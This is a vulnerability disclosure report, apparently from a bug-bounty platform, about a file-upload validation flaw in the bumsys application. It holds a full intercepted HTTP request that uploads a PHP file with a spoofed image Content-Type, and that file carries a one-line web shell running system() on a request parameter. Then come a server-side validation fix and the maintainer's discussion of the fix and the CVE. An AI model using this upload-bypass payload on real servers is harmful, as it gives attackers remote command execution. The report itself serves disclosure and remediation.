File Upload Type Validation Error in unilogies/bumsys

Valid

Reported on

Jan 19th 2023


Description

The application does not properly validate the file type or extension during the upload process, allowing any authenticated user to bypass the check.

Steps to Reproduce

- Navigate to this URL: [https://demo.bumsys.org/settings/shop-list/](https://demo.bumsys.org/settings/shop-list/)
- Click on the action button to edit the profile
- Click on the select logo button to upload the image
- Intercept the POST request and make the changes below.

Proof of Concept

- The application allows only jpeg, jpg and png image types to be uploaded.
- The following request was modified to upload a PHP file and bypass the check, since the application validates only the Content-Type, not the extension of the file.

Burpsuite-Request

```http
POST /xhr/?module=settings&page=updateShop HTTP/1.1
Host: demo.bumsys.org
Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7
Content-Length: 1280
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"
X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA
Accept: */*
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.bumsys.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.bumsys.org/settings/shop-list/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopName"

TEST
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopAddress"

 test 
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCity"

testcity
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopState"

teststate
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPostalCode"

700056
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCountry"

testIND
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPhone"

895623122
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopEmail"

test@gmail.com
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopInvoiceFooter"

 
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php"
Content-Type: image/png

<?php echo system($_REQUEST['dx']); ?>
```

Burpsuite-Response

```http
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2023 07:14:26 GMT
Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips
X-Powered-By: PHP/7.0.33
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 65

<div class='alert alert-success'>Shop successfully updated.</div>
```

Video PoC

https://drive.google.com/drive/folders/1FjCIRSSimDherYajo1X8Sm-8voDBkITH?usp=sharing

Impact

Because the application does not properly validate the file extension, a PHP file can be uploaded, which could potentially allow an attacker to execute arbitrary code on the server.
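
The request above is accepted because only the part's client-supplied `Content-Type` header is checked. A server-side check that closes this gap is sketched below as an added example; it is not code from this report or from bumsys. It assumes PHP 7+ with the fileinfo extension, and the helper name `validate_logo_upload()`, the 2 MiB limit and `$uploadDir` are hypothetical.

```php
<?php
// Added example (hypothetical helper, not bumsys code).
// Allowlist: extension => MIME type expected from the file's own bytes.
const ALLOWED_IMAGES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
];

/**
 * Validate one $_FILES entry and return a server-generated file name.
 * Throws RuntimeException when the upload is rejected.
 */
function validate_logo_upload(array $file, int $maxBytes = 2097152): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Upload failed');
    }
    $size = filesize($file['tmp_name']);
    if ($size === false || $size === 0 || $size > $maxBytes) {
        throw new RuntimeException('File size out of range');
    }
    // 1. Extension of the client-supplied name, lower-cased, against the allowlist.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_IMAGES)) {
        throw new RuntimeException('Extension not allowed');
    }
    // 2. Type sniffed from the bytes on disk. $file['type'] is only the
    //    part's Content-Type header, which the client controls, so it is ignored.
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($detected !== ALLOWED_IMAGES[$ext]) {
        throw new RuntimeException('Content does not match extension');
    }
    // 3. The file must have a readable image header.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('Not an image');
    }
    // 4. Never reuse the client's name: a random name plus the allowlisted
    //    extension removes double extensions, odd casing and path tricks.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Usage inside the upload handler ($uploadDir is an assumed storage path):
// $name = validate_logo_upload($_FILES['shopLogo']);
// move_uploaded_file($_FILES['shopLogo']['tmp_name'], $uploadDir . '/' . $name);
```

Serving the upload directory with script execution disabled adds a second layer if one of these checks is ever bypassed.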

We are processing your report and will contact the unilogies/bumsys team within 24 hours. 2 months ago
We have contacted a member of the unilogies/bumsys team and are waiting to hear back 2 months ago
Khurshid Alam validated this vulnerability 2 months ago
ctflearner has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Khurshid Alam
2 months ago

Maintainer


@ctflearner, Thank you so much for the report. It is really admirable work.

By the way, is there any virus in that PHP file? I do not think so, but my system is detecting it as a virus!

Looking forward to hearing from you.

Khurshid Alam
2 months ago

Maintainer


So, should I validate file extension instead of file type or both? What would be the best solution for this? Thanks.

ctflearner
2 months ago

Researcher


@Khurshid Alam, talking about the PHP file, it doesn't contain a virus.

ctflearner
2 months ago

Researcher


Talking about the validation, you should implement both.

Khurshid Alam
2 months ago

Maintainer


@ctflearner, I have updated the issue on https://demo.bumsys.org/. Could you please confirm whether it is fixed or not? So, I can update the repo.

Thank you.

ctflearner
2 months ago

Researcher


@Khurshid Alam, the above issue is fixed, but you have to implement one extra thing, "Obfuscating file extensions". Here is the link to a resource, https://portswigger.net/web-security/file-upload, that you can look into to fix the issue.

ctflearner
2 months ago

Researcher


@Khurshid Alam, I would be glad if you could assign a CVE for this.

Khurshid Alam
2 months ago

Maintainer


@ctflearner, Thank you for confirming. Let me check the article.

Khurshid Alam
2 months ago

Maintainer


I think obfuscating file extensions is not applicable here. Could you please check the code and let me know if it is okay?

function.php L1468

config.php L62

ctflearner
2 months ago

Researcher


Yes, it is okay. Kindly look into my request for a CVE for this.

Khurshid Alam
2 months ago

Maintainer


Ok, How do I do that?

ctflearner
2 months ago

Researcher


You can contact huntr-dev about the CVE-related issue from your end; I cannot do anything from my side. Check the policy (https://huntr.dev/policy/) or mail them about how to assign a CVE. Thanks.

ctflearner
2 months ago

Researcher


I think on this platform your CVE category is set to "NO". If you could change it from "NO" to "YES", I mean "CVE: YES", then it will be easy for you to assign a CVE to a researcher.

ctflearner
2 months ago

Researcher


You can refer to this website: https://www.cve.org/PartnerInformation/ListofPartners/partner/@huntrdev and please let me know if you have any issue or query.

ctflearner
2 months ago

Researcher


And if you want to see the reference of the CVE report, you can visit the link below: https://nvd.nist.gov/vuln/detail/CVE-2022-4506

Khurshid Alam marked this as fixed in v1.0.3-beta with commit a5beff 2 months ago
Khurshid Alam has been awarded the fix bounty
This vulnerability will not receive a CVE
Khurshid Alam published this vulnerability 2 months ago
Khurshid Alam
2 months ago

Maintainer


@admin, please assign a CVE. thanks!

Ben Harvie
2 months ago

Admin


CVE assigned as requested :)

Khurshid Alam
2 months ago

Maintainer


Thank you.
